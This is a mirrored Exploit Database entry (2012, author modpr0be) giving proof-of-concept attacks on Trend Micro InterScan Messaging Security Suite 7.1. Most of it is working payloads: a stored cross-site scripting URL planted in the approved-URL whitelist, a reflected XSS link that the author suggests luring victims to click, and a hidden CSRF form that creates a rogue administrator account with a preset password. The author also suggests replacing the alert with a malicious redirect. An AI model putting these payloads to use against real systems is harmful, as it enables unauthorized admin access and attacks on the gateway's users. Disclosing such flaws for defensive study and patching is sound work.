Trend Micro Interscan Messaging Security Suite – Persistent Cross-Site Scripting / Cross-Site Request Forgery

• Exploit Database
• 10 阅读

• 作者： modpr0be
  日期： 2012-09-14
• 类别：

  • webapps
  平台：

  • aix
• 来源：https://www.exploit-db.com/exploits/21319/

• # Exploit Title: Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF
  # Date: 13/09/2012
  # Exploit Author: modpr0be (modpr0be[at]spentera.com)
  # Vendor Homepage: http://www.trendmicro.com
  # Software Link: http://www.trendmicro.com/ftp/products/interscan/IMSS_v7.1_Win_1394.zip
  # Version: 7.1-Build_Win32_1394
  # Tested on: Windows 2003 Standard Edition, XAMPP 1.7.4 (Default Config)
  # CVE : CVE-2012-2995, CVE-2012-2996
  
  # Software Description
  # TrendMicro Interscan Messaging Security is the industry’s most comprehensive 
  # mail gateway security. Choose state-of-the-art software or a hybrid solution 
  # with on-premise virtual appliance and optional cloud pre-filter that blocks 
  # the vast majority of spam and malware outside your network. Plus our Data 
  # Privacy and Encryption Module secure outbound data to ensure privacy and 
  # regulatory compliance.
  
  # Vulnerability Overview
  # Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79) 
  # and cross-site request forgery (CWE-352) vulnerabilities.
  
  # Proof of Concept
  # Persistent/Stored XSS
  # this POC will store defined URL to white list URL page. Each time we access to this page, the XSS word
  # will pop up to the user. You can change the alert message box to something nasty (e.g redirect to beef??)
  hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script>
  
  # Non-persistent/Reflected XSS
  # This is non-persistent XSS, you might lure target user to click this link :)
  hxxps://127.0.0.1/initUpdSchPage.imss?src="https://www.exploit-db.com/exploits/21319/><script>alert('XSS')</script>
  
  # Cross-Site Request Forgery
  # This POC should be targeted to user with admin privilege
  # It will add admin user with user quorra, and password quorra.123
  # Target victim must be authenticated when perform this POC
  <html>
  <body>
  <form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
  <input type="hidden" name="enabled" value="on" />
  <input type="hidden" name="authMethod" value="1" />
  <input type="hidden" name="name" value="quorra" />
  <input type="hidden" name="password" value="quorra.123" />
  <input type="hidden" name="confirmPwd" value="quorra.123" />
  <input type="hidden" name="tabAction" value="saveAuth" />
  <input type="hidden" name="gotoTab" value="saveAll" />
  <input type="submit" value="CSRF" />
  </form>
  </body>
  </html>
  
  # References
  # http://www.spentera.com/advisories/2012/SPN-05-2012.html
  # http://www.kb.cert.org/vuls/id/471364
  # http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html